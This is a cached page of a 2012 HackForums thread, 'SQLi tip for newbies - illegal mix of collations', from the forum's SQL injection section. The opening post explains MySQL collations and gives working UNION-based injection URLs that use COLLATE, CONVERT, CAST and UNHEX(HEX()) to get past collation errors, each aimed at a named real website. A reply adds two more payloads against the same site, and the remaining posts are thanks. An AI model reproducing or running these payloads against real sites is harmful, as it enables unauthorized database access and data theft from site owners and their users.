<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=2811867" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=2811867" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=2811867</a>. It is a snapshot of the page as it appeared on 5 Mar 2014 00:56:49 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=2811867" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:jKtIe5ug0m0J:www.hackforums.net/showthread.php%3Ftid%3D2811867&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>SQLi tip for newbies - illegal mix of collations - Page 1</title> <meta name="description" content="SQL Injection Attacks-SQLi tip for newbies - illegal mix of collations"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=2811867"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 03-04-2014, 05:56 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">SQLi tip for newbies - illegal mix of collations</span></div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=2811867" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/rating.js"></script><div id="success_rating_2811867" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_2811867"><li style="width: 0%" class="current_rating" id="current_rating_2811867">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=2811867&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2811867&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2811867&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2811867&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2811867&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_2811867" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_2811867_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=2811867" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=2811867&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_2811867");
// -->
</script><div><strong>SQLi tip for newbies - illegal mix of collations</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid25872853" id="pid25872853"></a><table class="tborder" style="border-top-width: 0; " id="post_25872853" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-26-2012, 04:33 AM <span id="edited_by_25872853"><span class="smalltext">(This post was last modified: 08-26-2012 04:44 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;pid=25872853#pid25872853">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 135<br>Posts: 2,207<br>Joined: Aug 2011 <br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">203</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_25872853">This tip is related to this challenge<br><a href="http://www.hackforums.net/showthread.php?tid=2806283." target="_blank">http://www.hackforums.net/showthread.php?tid=2806283.</a> Purpose of that challenge was to learn how to overcome specific error (<span style="color: #FF4500;">illegal mix of collation</span>).<br><br><span style="font-weight: bold;"><span style="color: #00BFFF;"><span style="font-size: medium;">Background</span></span></span><br>Collation
 refers to a set of rules that determine how data is sorted and 
compared. Character data is sorted using rules that define the correct 
character sequence, with options for specifying case-sensitivity, accent
 marks, character types and character width.<br><br>Collation is 
concerned with how character data is interpreted by SQL Server. Because 
many people use MySQL with data to be stored in languages other than 
English, they need to select the rules of comparisons which in turn 
depends on the character set used for storing that data.<br><br>In 
MySQL, data is stored using a specific character set, which can be 
defind at different levels; i.e., the sever, the database, the table, 
and the column levels.<br><br>With <span style="font-weight: bold;"><span style="color: #32CD32;">union select</span></span> we are combining result-set of two or more select statements. We already know that each SELECT statement within the UNION <span style="font-weight: bold;"><span style="color: #FF4500;">must have the same number of columns</span></span>. The columns must also have similar data types. <span style="font-weight: bold;"><span style="color: #FFA500;">And they must have same collation !!!!</span></span> If they are different we get an error. See example bellow:<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,version(),3,4,5,6,7,8--</code></div></div><br><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/b1632ec7b6b07915ca6d868f38d00af2.jpg" alt="[Image: b1632ec7b6b07915ca6d868f38d00af2.jpg]" border="0"><br><br>So how to overcome such error? There are different options:<br><br><span style="color: #00BFFF;"><span style="font-weight: bold;">1. Define COLLATE</span></span><br>SELECT * FROM table ORDER BY somekey <span style="color: #32CD32;">COLLATE latin1_general_ci</span>;<br><br>We can use different collation names:<br>latin1_general_ci<br>utf8_general_ci<br>utf8_unicode_ci<br>latin1_german1_ci<br>latin1_swedish_ci<br>...<br>...<br>A name ending in <span style="color: #32CD32;">_ci </span>indicates a case-insensitive collation.<br>A name ending in <span style="color: #32CD32;">_cs</span> indicates a case-sensitive collation.<br>A name ending in <span style="color: #32CD32;">_bin</span> indicates a binary collation. Character comparisons are based on character binary code values.<br><br><span style="color: #00BFFF;"><span style="font-weight: bold;">2. Use function CONVERT</span></span><br>CONVERT() provides a way to convert data between different character sets. The syntax is:<br><br>CONVERT(expr USING transcoding_name)<br><br>Example:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,convert(version() using binary),3,4,5,6,7,8--</code></div></div><br><span style="color: #00BFFF;"><span style="font-weight: bold;">3. Use function CAST</span></span><br>You may also use CAST() to convert a string to a different character set. The syntax is:<br><br>CAST(character_string AS character_data_type CHARACTER SET charset_name)<br><br>Example:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,cast(version() as binary),3,4,5,6,7,8--</code></div></div><br><span style="color: #00BFFF;"><span style="font-weight: bold;">4. Use function UNHEX(HEX(xx))</span></span><br>UNHEX() --&gt; Return a string containing hex representation<br>HEX() --&gt; Return a hexadecimal representation of a decimal or string value<br><br>Example:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,UNHEX(HEX(version())),3,4,5,6,7,8--</code></div></div><br>Hope this helps to somebody in the future. <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"></div><div class="post_meta" id="post_meta_25872853"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2811867&amp;replyto=25872853" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid25878526" id="pid25878526"></a><table class="tborder" style="margin-top: 5px; " id="post_25878526" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-26-2012, 09:23 AM <span id="edited_by_25878526"><span class="smalltext">(This post was last modified: 08-26-2012 09:26 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=475367">denjacker</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;pid=25878526#pid25878526">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=475367"><span class="group2">denjacker</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 22<br>Posts: 313<br>Joined: Sep 2010<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=475367"><strong class="reputation_positive">44</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_25878526">also ..<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,uncompress(compress(version())),3,4,5,6,7,8--</code></div></div>and<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,aes_decrypt(aes_encrypt(version(),1),1),3,4,5,6,7,8--</code></div></div></div><div class="post_meta" id="post_meta_25878526"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=475367" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2811867&amp;replyto=25878526" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid25878557" id="pid25878557"></a><table class="tborder" style="margin-top: 5px; " id="post_25878557" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-26-2012, 09:24 AM <span id="edited_by_25878557"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;pid=25878557#pid25878557">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1208053"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/image.jpg" alt="" height="100" width="86"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1208053"><span class="group2">haczord</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 17<br>Posts: 309<br>Joined: Mar 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1208053"><strong class="reputation_positive">6</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_25878557">very good tutorial,thanks for the tutor<br>very nice guy helps so much.</div><div class="post_meta" id="post_meta_25878557"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1208053" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2811867&amp;replyto=25878557" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid25881208" id="pid25881208"></a><table class="tborder" style="margin-top: 5px; " id="post_25881208" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-26-2012, 11:10 AM <span id="edited_by_25881208"><span class="smalltext">(This post was last modified: 08-26-2012 11:10 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;pid=25881208#pid25881208">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 135<br>Posts: 2,207<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">203</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_25881208"><blockquote><cite><span>(08-26-2012 09:23 AM)</span>denjacker Wrote: <a href="http://www.hackforums.net/showthread.php?pid=25878526#pid25878526" class="quick_jump">►</a></cite>also ..<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,uncompress(compress(version())),3,4,5,6,7,8--</code></div></div>and<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.andytimmons.com/video.php?id=0004 and 0 UNION SELECT 1,aes_decrypt(aes_encrypt(version(),1),1),3,4,5,6,7,8--</code></div></div></blockquote><br>Thanks denjacker. Obviously there are many ways <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><hr><blockquote><cite><span>(08-26-2012 09:24 AM)</span>haczord Wrote: <a href="http://www.hackforums.net/showthread.php?pid=25878557#pid25878557" class="quick_jump">►</a></cite>very good tutorial,thanks for the tutor<br>very nice guy helps so much.</blockquote><br>Thanks haczord for the kind words. <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_25881208"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2811867&amp;replyto=25881208" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26077551" id="pid26077551"></a><table class="tborder" style="margin-top: 5px; " id="post_26077551" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-02-2012, 01:35 AM <span id="edited_by_26077551"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;pid=26077551#pid26077551">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1443577"><span style="color:#383838">Light Yagami.</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Closed Account<br><span class="userstars"></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 63<br>Posts: 1,900<br>Joined: Aug 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1443577"><strong class="reputation_positive">69</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26077551">nice tut bro i well read and learn from this</div><div class="post_meta" id="post_meta_26077551"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1443577" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2811867&amp;replyto=26077551" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26080923" id="pid26080923"></a><table class="tborder" style="margin-top: 5px; " id="post_26080923" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-02-2012, 05:25 AM <span id="edited_by_26080923"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2811867&amp;pid=26080923#pid26080923">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1310549"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/bam.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1310549"><span class="group2">BlackRoas</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20illegal%20mix%20of%20collations%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 26<br>Posts: 556<br>Joined: May 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1310549"><strong class="reputation_positive">32</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26080923">good tut brother keep going</div><div class="post_meta" id="post_meta_26080923"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1310549" class="bitButton" 